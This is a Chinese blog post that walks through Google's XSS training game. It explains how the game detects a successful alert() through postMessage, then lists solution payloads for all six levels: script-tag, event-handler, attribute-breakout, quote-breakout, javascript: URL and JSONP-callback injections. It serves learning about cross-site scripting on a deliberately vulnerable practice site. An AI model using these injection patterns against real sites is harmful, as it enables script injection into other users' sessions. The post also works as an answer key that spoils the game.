Google最近出了一XSS游戏：

我这个菜鸟看提示，花了两三个小时才全过了。。

这个游戏的规则是仅仅要在攻击网页上弹出alert窗体就能够了。

题目页面是在iframe里嵌套的展现的。那么父窗体是怎样知道iframe里成功弹出了窗体？

是这样子实现的：

题目页面载入了这个js，改写了alert函数，当alert被调用时，向parent发送一个消息。

https://xss-game.appspot.com/static/game-frame.js

/* If we're being iframed, let the parent know our URL *//* Kids: don't do this at home! */parent.postMessage(window.location.toString(), "*");/* Override window.alert */var originalAlert = window.alert;window.alert = function(s) {  parent.postMessage("success", "*");  setTimeout(function() {     originalAlert("Congratulations, you executed an alert:\n\n"       + s + "\n\nYou can now advance to the next level.");  }, 50);}

然后父窗体注冊了一个EventListener来接收这个消息：

https://xss-game.appspot.com/static/game.js

window.addEventListener("message", function(event) {  if (!window.location.origin) {    window.location.origin = window.location.protocol + "//"         + window.location.hostname         + (window.location.port ?

':' + window.location.port: ''); } if (event.origin == window.location.origin && event.data == "success") { userOpenedAlert = true; levelSolved(); return; }

最以下是题目的答案。假设想自己玩游戏的，慎拉下。

题目的答案：

Level1:

<script>alert(1)</script>

Level2:

<input οnmοuseοver="alert(1)">

Level3:

https://xss-game.appspot.com/level3/frame#3.jpg' οnlοad="alert(1)">

Level4:

3');alert('1

Level5:

https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)

Level6:

重点是前面要有一个空格。

​ https://www.google.com/jsapi?

callback=alert

游戏过关之后，google给出了一个xss的文档：

版权声明：本文博客原创文章。博客，未经同意，不得转载。